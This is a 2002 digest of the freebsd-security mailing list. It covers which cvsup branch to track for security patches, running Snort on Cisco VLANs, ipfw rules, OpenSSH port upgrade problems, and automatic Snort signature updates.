To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 12:33: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8B55B37B400 for ; Mon, 1 Jul 2002 12:32:58 -0700 (PDT) Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8AB3F43E13 for ; Mon, 1 Jul 2002 12:32:57 -0700 (PDT) (envelope-from kdk@daleco.biz) Received: from daleco [12.145.236.237] by mail.gbronline.com (SMTPD32-7.10) id AE0911AE0246; Mon, 01 Jul 2002 14:31:21 -0500 Message-ID: <008401c22136$08d62e00$edec910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: "Ralph Huntington" , References: <20020701141839.V50179-100000@mohegan.mohawk.net> Subject: Re: security fixes Date: Mon, 1 Jul 2002 14:32:26 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org No one's tried on this yet, so I will. comments inline ----- Original Message ----- From: "Ralph Huntington" To: Sent: Monday, July 01, 2002 1:20 PM Subject: security fixes > With all the traffic surrounding these recent vulnerabilities, it's a > little confusing to know what one has to do and need not do. Let me ask > this one question, please: > > In cvsup'ing the patched sources, if I have a 4.6-RELEASE box, should I > cvsup RELENG_4_6 and for the earlier 4.x machines cvsup RELENG_4 ??? > The more I think about the question, the tricker it gets, so I think I begin to see your point. 
You'd have to look at what's been committed to see for sure. I don't think that you'd break anything by doing RELENG_4_6 even on your earlier boxes, though. After all, you're going to make buildworld anyway... If you cvsup the "earlier" machines to RELENG_4, they will actually be "more up to date" than the 4.6-RELEASE box you have now, not that I'm telling you something you don't already know, I guess. > Or should they all get RELENG_4 ? > If you want them all to run -STABLE, yes. Personally, -STABLE seems pretty -STABLE right now, for me, running mail, web, database, etc. They say "you may not wish to run -STABLE on production servers" so *caveat emptor*, I guess, but I have no probs with -STABLE built last week. > Thank you, Ralph > HTH, KDK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 12:40:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 58BC737B400 for ; Mon, 1 Jul 2002 12:40:24 -0700 (PDT) Received: from web10106.mail.yahoo.com (web10106.mail.yahoo.com [216.136.130.56]) by mx1.FreeBSD.org (Postfix) with SMTP id 21AF943E26 for ; Mon, 1 Jul 2002 12:40:24 -0700 (PDT) (envelope-from twigles@yahoo.com) Message-ID: <20020701194023.12286.qmail@web10106.mail.yahoo.com> Received: from [68.5.49.41] by web10106.mail.yahoo.com via HTTP; Mon, 01 Jul 2002 12:40:23 PDT Date: Mon, 1 Jul 2002 12:40:23 -0700 (PDT) From: twig les Subject: Re: snort + vlans To: "Dmitry S. 
Rzhavin" , mike.jablonski@abnamrousa.com, security@FreeBSD.ORG In-Reply-To: <3D20904C.8AF8703C@rt.ru> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I don't like being the bearer of bad news, but the SPAN feature on the 2900 and 3500 series *sucks*. To answer your question about which interface to use, bind Snort to the interface that is inside the VLAN you want to monitor, because otherwise you won't see any traffic. The bigger Catalysts can monitor multiple VLANs but not the 29/35s. Another limitation of this series is the ability to only set one receive port. Again, the bigger switches don't have this. Also, read this fun fact from Cisco's site: "The monitoring port receives copies of transmitted and received traffic for all monitored ports. In this architecture, a packet destined for multiple destinations is stored in memory until all copies have been forwarded. If the monitoring port is 50 percent oversubscribed for a sustained period of time, it will probably become congested and hold part of the shared memory. One or more of the ports being monitored might then also experience a slowdown." http://www.cisco.com/warp/public/473/41.html#archXL This pretty much means that if your sniffer port is over 50% then it will drag other ports down. Cisco has a neat feature called port protection too. Well that breaks sniffing also. Sorry if this is kind of a rant. I have gone through many rites of passage on our Cisco switches (and lately the routers...). --- "Dmitry S. Rzhavin" wrote: > mike.jablonski@abnamrousa.com wrote: > > > > you need to enable the span port feature. > > > > Sorry, seems my explain was too bad. > I have internal FW. It is connected to cat2924 > with xl0 at 100Mbit. > Switch port is in trunk mode. > there is 2 vlans on xl0: vlan0 and vlan1. 
> There is no ip on xl0. > My defaultouter (cisco 26XX) is in vlan0 (trunk > too). > My office subnet is on vlan1 (all office hosts > configured as vlan 1 on switch). > > So, my box works as router+FW between vlan0 and > vlan1. > Now it works. > > So, I want to setup snort to detect attacks. > What iface (xl0, vlan0, or what) shall I bind snort > (snort -i flag) to make it analyze both internal > and external traffic? > > Another question is: cisco detects vlans with vtp > protocol. Does FreeBSD supports it? > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 12:41:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 62A8A37B400 for ; Mon, 1 Jul 2002 12:41:55 -0700 (PDT) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A4DF043E09 for ; Mon, 1 Jul 2002 12:41:54 -0700 (PDT) (envelope-from rjh@mohawk.net) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.11.4/8.11.3) with ESMTP id g61Jfq246102; Mon, 1 Jul 2002 15:41:52 -0400 (EDT) Date: Mon, 1 Jul 2002 15:41:52 -0400 (EDT) From: Ralph Huntington To: "Kevin Kinsey, DaleCo, S.P." 
Cc: Subject: Re: security fixes In-Reply-To: <008401c22136$08d62e00$edec910c@fbccarthage.com> Message-ID: <20020701153650.Q50179-100000@mohegan.mohawk.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

> > In cvsup'ing the patched sources, if I have a 4.6-RELEASE box, should I
> > cvsup RELENG_4_6 and for the earlier 4.x machines cvsup RELENG_4 ???

> I don't think that you'd break anything by doing RELENG_4_6 even on
> your earlier boxes, though. After all, you're going to make
> buildworld anyway...

Yes, I'll make buildworld.

> If you cvsup the "earlier" machines to RELENG_4, they will actually
> be "more up to date" than the 4.6-RELEASE box you have now, not
> that I'm telling you something you don't already know, I guess.

I thought that, but frankly wasn't sure. It seems counterintuitive, but that
doesn't mean it's not the right way.

> > Or should they all get RELENG_4 ?

> If you want them all to run -STABLE, yes. Personally, -STABLE seems
> pretty -STABLE right now, for me, running mail, web, database, etc.
> They say "you may not wish to run -STABLE on production servers" so
> *caveat emptor*, I guess, but I have no probs with -STABLE built last
> week.

Hmmm... I would think STABLE is what one should want to run on a production
machine. I'm beginning to feel confused again.

Thanks for the reply, though. It did answer my question. I also received this
in an email reply:

"... you can cvsup RELENG_4_6 to get the security update ONLY and make world
to install it, or you can use RELENG_4 to get the security fix AND new
-STABLE code, then make world."

That makes RELENG_4 seem like a bargain.
Thanks again for the replies, Ralph To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 13: 7:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4630637B400 for ; Mon, 1 Jul 2002 13:07:32 -0700 (PDT) Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by mx1.FreeBSD.org (Postfix) with ESMTP id 98C0743E09 for ; Mon, 1 Jul 2002 13:07:31 -0700 (PDT) (envelope-from kdk@daleco.biz) Received: from daleco [12.145.236.237] by mail.gbronline.com (SMTPD32-7.10) id A62363D9007E; Mon, 01 Jul 2002 15:05:55 -0500 Message-ID: <009201c2213a$dd3a4b00$edec910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: "Ralph Huntington" Cc: References: <20020701153650.Q50179-100000@mohegan.mohawk.net> Subject: Re: security fixes Date: Mon, 1 Jul 2002 15:07:01 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ----- Original Message ----- From: "Ralph Huntington" To: "Kevin Kinsey, DaleCo, S.P." Cc: Sent: Monday, July 01, 2002 2:41 PM Subject: Re: security fixes >Hmmm... I would think STABLE is what one sould >want to run on a production >machine. I'm beginning to feel confused again. As opposed to -CURRENT, yes. However, the committers want everyone to realize that once in a while you might build -STABLE with something broken (albeit rare, as in the coincidence of the "blue moon" and "hen's teeth" together...) but it still could happen. 
-RELEASE is a -STABLE that gets frozen for a while to see if any problems pop up, or if it can be crowed about and burned to CD with confidence (I hope the RELENG team doesn't think I'm minimizing their hard work here.) Some people read the warning about -STABLE in the Handbook (that I quoted earlier) and decide only to run -RELEASE and patch security fixes, and there is a cvs tag for this, called RELENG_4_x. This is where a little confusion comes in, because after a while they quit patching the older releases. The official line is that it's the current release (4.6) and the last (4.5) that are being patched, so if you're still running 4.4-R, (for example) you're no longer sure you can cvsup with RELENG_4_4 and get any new patches. As I said, -STABLE's running fine for me right now and has everytime I've tried it. [If there's confusion on the term "production machine," I take this to mean an active www/mail/file server that you can't afford to have downtime on....] KDK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 13:16:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6FC0037B400 for ; Mon, 1 Jul 2002 13:16:40 -0700 (PDT) Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by mx1.FreeBSD.org (Postfix) with SMTP id 2985743E09 for ; Mon, 1 Jul 2002 13:16:39 -0700 (PDT) (envelope-from Gerhard.Sittig@gmx.net) Received: (qmail 17794 invoked by uid 0); 1 Jul 2002 20:16:37 -0000 Received: from p5091081e.dip0.t-ipconnect.de (HELO mail.gsinet.sittig.org) (80.145.8.30) by mail.gmx.net (mp004-rz3) with SMTP; 1 Jul 2002 20:16:37 -0000 Received: (qmail 39904 invoked from network); 1 Jul 2002 19:48:33 -0000 Received: from shell.gsinet.sittig.org (192.168.11.153) by mail.gsinet.sittig.org with SMTP; 1 Jul 2002 19:48:33 -0000 Received: (from sittig@localhost) 
by shell.gsinet.sittig.org (8.11.3/8.11.3) id g61JmPU39891 for security@freebsd.org; Mon, 1 Jul 2002 21:48:25 +0200 (CEST) (envelope-from sittig) Date: Mon, 1 Jul 2002 21:48:25 +0200 From: Gerhard Sittig To: security@freebsd.org Subject: Re: Making a firewall more closed Message-ID: <20020701214825.L1494@shell.gsinet.sittig.org> Mail-Followup-To: security@freebsd.org References: <01a001c22107$3d3b2850$0200a8c0@winxp> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <01a001c22107$3d3b2850$0200a8c0@winxp>; from nascar24@home.nl on Mon, Jul 01, 2002 at 03:57:23PM +0200 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Mon, Jul 01, 2002 at 15:57 +0200, nascar24 wrote:
>
> I've been using the IPFW for some time now but I have one problem. I have
> closed my firewall (I guess) from attacks from the outside world. But I am
> open to attacks from within, i.e: trojan horses etc.
>
> Here is my rc.firewall.rules file. I think it is in rule 500 & 550. But if I
> change them to 21,22,80,8080 I cannot connect to any websites or FTP sites.
>
> [ filter rule set snipped ]
>
> I hope you can help, thanks in advance.

What exactly is your question? If you want to "less trust the inside",
close the inner interface as much as you did with the outside.

If you are looking for hints on how to generally improve your filter rules
I strongly suggest you have a look at the ipfilter HowTo -- even if you
don't use ipf: this document talks about the basics, too, plus derives /
designs a rule set from bottom up. Visit www.ipfilter.org or look at the
misc/26763 PR (Cyrille Lefevre, "installing ipfilter sample files to
share/examples").
virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 13:17: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1AAAF37B400 for ; Mon, 1 Jul 2002 13:16:57 -0700 (PDT) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4D4BF43E09 for ; Mon, 1 Jul 2002 13:16:56 -0700 (PDT) (envelope-from rjh@mohawk.net) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.11.4/8.11.3) with ESMTP id g61KGo254563; Mon, 1 Jul 2002 16:16:50 -0400 (EDT) Date: Mon, 1 Jul 2002 16:16:50 -0400 (EDT) From: Ralph Huntington To: "Kevin Kinsey, DaleCo, S.P." Cc: Subject: Re: security fixes In-Reply-To: <009201c2213a$dd3a4b00$edec910c@fbccarthage.com> Message-ID: <20020701161533.E50179-100000@mohegan.mohawk.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Well, that all makes enough sense. Yes, I know about production machines. Got quite a few of them to be responsible for. And always have run RELEASE but thought to ask for clarification about STABLE. Thanks to all who replied. - Ralph On Mon, 1 Jul 2002, Kevin Kinsey, DaleCo, S.P. wrote: > ----- Original Message ----- > From: "Ralph Huntington" > To: "Kevin Kinsey, DaleCo, S.P." > Cc: > Sent: Monday, July 01, 2002 2:41 PM > Subject: Re: security fixes > > >Hmmm... 
I would think STABLE is what one sould > >want to run on a production > >machine. I'm beginning to feel confused again. > > As opposed to -CURRENT, yes. However, > the committers want everyone to realize that > once in a while you might build -STABLE with > something broken (albeit rare, as in the coincidence > of the "blue moon" and "hen's teeth" together...) > but it still could happen. -RELEASE is a -STABLE > that gets frozen for a while to see if any problems > pop up, or if it can be crowed about and burned > to CD with confidence (I hope the RELENG team > doesn't think I'm minimizing their hard work here.) > > Some people read the warning about -STABLE in > the Handbook (that I quoted earlier) and decide only > to run -RELEASE and patch security fixes, and > there is a cvs tag for this, called RELENG_4_x. > This is where a little confusion comes in, because > after a while they quit patching the older releases. > The official line is that it's the current release (4.6) > and the last (4.5) that are being patched, so if > you're still running 4.4-R, (for example) you're no > longer sure you can cvsup with RELENG_4_4 > and get any new patches. > > As I said, -STABLE's running fine for me > right now and has everytime I've tried it. > > [If there's confusion on the term "production > machine," I take this to mean an active > www/mail/file server that you can't afford > to have downtime on....] 
> > KDK > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 13:25:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E4C5237B400 for ; Mon, 1 Jul 2002 13:25:55 -0700 (PDT) Received: from vec.nogood.org (CPE00045a0a55e6.cpe.net.cable.rogers.com [24.101.6.138]) by mx1.FreeBSD.org (Postfix) with ESMTP id CC4E443E0A for ; Mon, 1 Jul 2002 13:25:53 -0700 (PDT) (envelope-from getsubmail@nogood.org) Received: from cport (cport.local [192.168.1.120]) by vec.nogood.org (8.12.5/8.12.5) with SMTP id g61KMc9V080708; Mon, 1 Jul 2002 16:22:38 -0400 (EDT) (envelope-from getsubmail@nogood.org) From: "getsubmail" To: "Eric Anderson" Cc: Subject: RE: SSH Patches Date: Mon, 1 Jul 2002 16:23:10 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <3D20A014.5B44DA36@centtech.com> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Lupe Christoph wrote: > > > > > > No default install without a remote root in over 20 years. > > > > > I think you're wrong here. They didn't have a networking stack before > > > Windows 3.11 for Workgroups, in the early 1990s, so it's more like ten > > > years. > > > > So it's no remote in a default install for the first ten years? > > Wo! Read it again: > No default install without a remote root in over 20 years. 
> should be: > No default install without a remote root in over 10 years. > > The other way would be very wrong (remember, we are talking about > the big evil > here). That is it's no remote (capability) in a default install for the first ten years? C.N. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 13:34:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9BAF437B400 for ; Mon, 1 Jul 2002 13:34:31 -0700 (PDT) Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by mx1.FreeBSD.org (Postfix) with ESMTP id B2C6743E0A for ; Mon, 1 Jul 2002 13:34:27 -0700 (PDT) (envelope-from pjklist@ekahuna.com) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com for ; Mon, 1 Jul 2002 13:34:26 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: security@FreeBSD.ORG Date: Mon, 1 Jul 2002 13:34:26 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: security-digest V5 #572 Reply-To: pjklist@ekahuna.com In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020701203426516.AAA817@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > On Sat, Jun 29, 2002 at 07:25:08PM -0500, Jack L. Stone wrote: > > At 07:47 PM 6.29.2002 -0500, Scott Robbins wrote: > > >On Sat, Jun 29, 2002 at 05:35:50PM -0500, Jack L. 
Stone wrote: > > >> At 07:07 PM 6.28.2002 -0600, FreeBSD user wrote: > > >> >cd /usr/ports/security/openssh-portable && make -DOPENSSH_OVERWRITE_BASE > > >> install distclean > > >> > > > >> I just ran this on a test box and the sshd version shows no change... I saw > > >> it compile and install, but #sshd -V gives old version #... > > >> > > >> What did I do wrong here...?? > > > > > >BTW after the other Scott's post, I tried it his way--leaving out > > >sshd_enable and sshd_program. Worked quite well--also, one reason I > > >haven't done the overwrite option--as Jonathan said, won't that get > > >clobbered next time you do make world? > > > > > >Interestingly enough, pkg-message suggests doing this--leaving > > >sshd_enable at YES, adding sshd_program and then editing the path, (I > > >assume root's) so that /usr/local/sbin comes before /usr/sbin. > > >However, I've found the lazy man's way, which seems to be efficient as > > >well, to be a combination of Jonathan's and the other Scott's. > > > > > >I realize this is not exactly what Jack is asking, but I'm wondering > > >too--if one does the OVERWRITE, won't it get clobbered upon the next > > >make world? > > > > > >Thanks > > >Scott Robbins > > >> > > This is what worries me too. I deinstalled the ssh port right afterwards, > > but I'm wondering what else is changed. I noticed it updated the > > openssl-0.9.6a to 0.9.6d that I didn't expect. The /var/db/pkg shows that > > "d" version installed. In my case I had installed the "openssh-overwrite-base-3.3p1_1 thing that was made just prior to 3.4 coming out. Then when I found out that our 2.9 was not affected, I just let it overwrite again when I rebuilt (to fix the libc thing) until (as suggested by someone here) I wait until 3.4 gets integrated into the base system. Then I accidentally ran portupgrade with the '*' wildcard [sigh], and when it got to that port it "upgraded" it to openssh-portable... 
BUT, instead of just nicely installing itself in /usr/local, it REMOVED the existing version 2.9 files, at the same time it did NOT update rc.conf with the new path, so basically left the sshd daemon nonfunctional which I had to fix. Worse yet, I can't get the ssh client to connect to another box, it says "DSA host key..not in list of known hosts", I tried copying the ssh_config to /usr/local/etc/ssh but that didn't help. (it *appears* to be set to look in the right place for the host keys (~/.ssh) but just not finding them) Rather than offering to import the key, it starts giving me an S/key prompt, which I've never seen before. -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 13:41:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7675A37B400 for ; Mon, 1 Jul 2002 13:41:54 -0700 (PDT) Received: from giganda.komkon.org (giganda.komkon.org [63.167.241.66]) by mx1.FreeBSD.org (Postfix) with ESMTP id DE01943E13 for ; Mon, 1 Jul 2002 13:41:53 -0700 (PDT) (envelope-from str@giganda.komkon.org) Received: (from str@localhost) by giganda.komkon.org (8.11.3/8.11.3) id g61KflZ53541; Mon, 1 Jul 2002 16:41:47 -0400 (EDT) (envelope-from str) Date: Mon, 1 Jul 2002 16:41:47 -0400 (EDT) From: Igor Roshchin Message-Id: <200207012041.g61KflZ53541@giganda.komkon.org> To: des@ofug.org, wollman@lcs.mit.edu Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. 
Cc: security@FreeBSD.ORG In-Reply-To: <200207011850.g61IolTT078907@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Listening to these two smart reputable people, I realize that that it's better to remove it [ssh] from both base and ports. It's time to switch back to UUCP ... 8-% > From owner-freebsd-security@FreeBSD.ORG Mon Jul 1 14:51:06 2002 > Date: Mon, 1 Jul 2002 14:50:47 -0400 (EDT) > From: Garrett Wollman > To: Dag-Erling Smorgrav > Cc: security@FreeBSD.ORG > Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. > > < said: > > > I don't care about the port. Personally, I'd rather it didn't exist, > > and I think admins who install it need to have their head checked. > > I don't care about the base-install ssh. Personally, I'd rather it > didn't exist, and I think admins who install it need to have their > heads checked. So there! 
> > -GAWollman > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 13:58: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B4E1A37B400; Mon, 1 Jul 2002 13:58:00 -0700 (PDT) Received: from lmri.ucsb.edu (orion.lmri.ucsb.edu [128.111.199.186]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6B31843E26; Mon, 1 Jul 2002 13:58:00 -0700 (PDT) (envelope-from stevem@lmri.ucsb.edu) Received: from lysander.lmri.ucsb.edu ([128.111.199.198] helo=lmri.ucsb.edu) by lmri.ucsb.edu with esmtp (Exim 3.31 #4) id 17P8F7-0009hz-00; Mon, 01 Jul 2002 13:57:53 -0700 Message-ID: <3D20C250.1020603@lmri.ucsb.edu> Date: Mon, 01 Jul 2002 13:57:52 -0700 From: Steve McGhee Organization: UC LMRI User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.1a) Gecko/20020611 X-Accept-Language: en-us, en MIME-Version: 1.0 To: snort-users@lists.sourceforge.net Cc: freebsd-security@freebsd.org, freebsd-ports@freebsd.org Subject: instant snort sigs for new vulnerabilites X-Enigmail-Version: 0.62.4.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 with all the fuss lately over the new apache worm, etc, id like to know if my machine is getting hit (its patched, just being curious). i know about mod_blowchunks, but im looking for something more general.. it seems to me that snort could see these attacks pretty easily. 
is there a tool/method out there that will retrieve the *latest* snort signatures automatically? for those of us not running snort via CVS, id like a way to do something like cvsup, but _only_ update my ruleset every night or whatever. i cc: the freebsd team as this might be a cool (simple) port. (something like /usr/ports/security/snort-signatures) this could be helpful to people who are just curious, or maybe could provide some good numbers to shock lazy sysadmins into actually patching their machines. ..of course, this is all assuming there's someone out there writing signatures ;) - -- - -steve ~ .......................................................... ~ Steve McGhee ~ Systems Administrator ~ Linguistic Minority Research Institute ~ UC Santa Barbara ~ phone: (805)893-2683 ~ email: stevem@lmri.ucsb.edu -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 Comment: Using PGP with Mozilla - http://enigmail.mozdev.org iQA/AwUBPSDCUKUr5syonrLMEQKjYQCfRiRGHIGGviqfGl/9xvRNpaambakAoIns BcxrxnUpvAJK3Sczy5nY4Ir5 =9LCO -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 14:48: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CAC4337B400 for ; Mon, 1 Jul 2002 14:48:06 -0700 (PDT) Received: from hyperreal.org (taz3.hyperreal.org [209.133.83.22]) by mx1.FreeBSD.org (Postfix) with SMTP id 35C1843E31 for ; Mon, 1 Jul 2002 14:48:06 -0700 (PDT) (envelope-from brian@hyperreal.org) Received: (qmail 31009 invoked from network); 1 Jul 2002 21:47:57 -0000 Received: from localhost.hyperreal.org (HELO yez.hyperreal.org) (127.0.0.1) by localhost.hyperreal.org with SMTP; 1 Jul 2002 21:47:57 -0000 Received: (qmail 27419 invoked by uid 1000); 1 Jul 2002 21:49:59 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Jul 2002 
21:49:59 -0000 Date: Mon, 1 Jul 2002 14:49:59 -0700 (PDT) From: Brian Behlendorf To: "Kevin Kinsey, DaleCo, S.P." Cc: freebsd-security@FreeBSD.ORG Subject: Re: security fixes In-Reply-To: <009201c2213a$dd3a4b00$edec910c@fbccarthage.com> Message-ID: <20020701144619.F6285-100000@yez.hyperreal.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost.hyperreal.org 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Mon, 1 Jul 2002, Kevin Kinsey, DaleCo, S.P. wrote:

> As I said, -STABLE's running fine for me
> right now and has every time I've tried it.

I too have tracked -STABLE for production machines and generally feel
pretty confident in doing so. The only time there was something wrong was
the /usr/bin/sed bug last week, which caused compiles of ports to start
failing in mysterious ways. Took me a while to figure that out, though the
fix was easy (make update; cd /usr/src/usr.bin/sed && make && make install).
So mistakes happen, more often than once in a blue moon, but not so often
that one should fear tracking -STABLE.
